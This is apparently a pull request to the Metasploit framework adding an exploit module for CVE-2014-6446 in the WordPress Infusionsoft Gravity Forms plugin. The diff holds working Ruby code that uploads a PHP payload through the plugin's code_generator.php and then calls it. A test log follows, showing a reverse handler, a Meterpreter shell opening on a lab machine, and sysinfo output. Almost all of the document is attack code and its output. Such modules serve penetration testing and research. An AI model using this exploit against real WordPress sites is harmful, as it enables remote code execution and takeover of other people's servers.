### PR TITLE
Wordpress Infusionsoft Gravity Forms CVE-2014-6446

### DIFF
--- a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
@@ -46,8 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi(
       'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
     )
-    return Exploit::CheckCode::Detected if res && res.code == 200
-
+    if res && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
+      return Exploit::CheckCode::Detected
+    end
     Exploit::CheckCode::Safe
   end
 

--- a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb
@@ -1,0 +1,82 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the Infusionsoft Gravity Forms plugins. The vulnerability allows for arbitrary file upload and remote code execution. Plug-in versions 1.5.3 through 1.5.10 are vulnerable.
+      },
+      'Author'         =>
+        [
+          'g0blin',                    # Vulnerability Discovery
+          'us3r777 <us3r777@n0b0.so>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-6446'],
+          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
+      'DisclosureDate' => 'Sep 25 2014',
+      'DefaultTarget'  => 0)
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
+    )
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
+                     'Infusionsoft', 'utilities', 'code_generator.php'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'fileNamePattern' => php_pagename,
+        'fileTemplate'    => payload.encoded
+      }
+    })
+
+    if res && res.code == 200
+      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+      register_files_for_cleanup(php_pagename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling payload ...")
+    send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
+                     'Infusionsoft', 'utilities', php_pagename)
+    })
+    handler
+  end
+
+end


### PR DESCRIPTION
# Description

The Infusionsoft Gravity Forms plugin 1.5.3 through 1.5.10 for
WordPress does not properly restrict access, which allows remote
attackers to upload arbitrary files and execute arbitrary PHP
code via a request to utilities/code_generator.php.
# Links

http://research.g0blin.co.uk/cve-2014-6446/
http://www.cvedetails.com/cve/CVE-2014-6446/
# Reproduction steps
- [x] Install a LAMP server
- [x] Install Wordpress
- [x] Install the Infusion Gravity Forms plugin ( https://wordpress.org/plugins/infusionsoft/ ) 
# Test

Tested on Infusionsoft Gravity Forms Version 1.5.9: 

```
2014-10-06 14:16:15 +0200 S:0 J:0 > use exploit/unix/webapp/php_wordpress_infusionsoft 
2014-10-06 14:16:20 +0200 S:0 J:0 exploit(php_wordpress_infusionsoft) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
2014-10-06 14:16:24 +0200 S:0 J:0 exploit(php_wordpress_infusionsoft) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
2014-10-06 14:16:27 +0200 S:0 J:0 exploit(php_wordpress_infusionsoft) > run

[*] Started reverse handler on 192.168.56.1:4444 
[+] 192.168.56.101:80 - Our payload is at: gJsEuZVlMWDq.php. Calling payload...
[*] 192.168.56.101:80 - Calling payload ...
[*] Sending stage (40551 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:55100) at 2014-10-06 14:16:31 +0200
[+] Deleted gJsEuZVlMWDq.php

meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686
Meterpreter : php/php
```
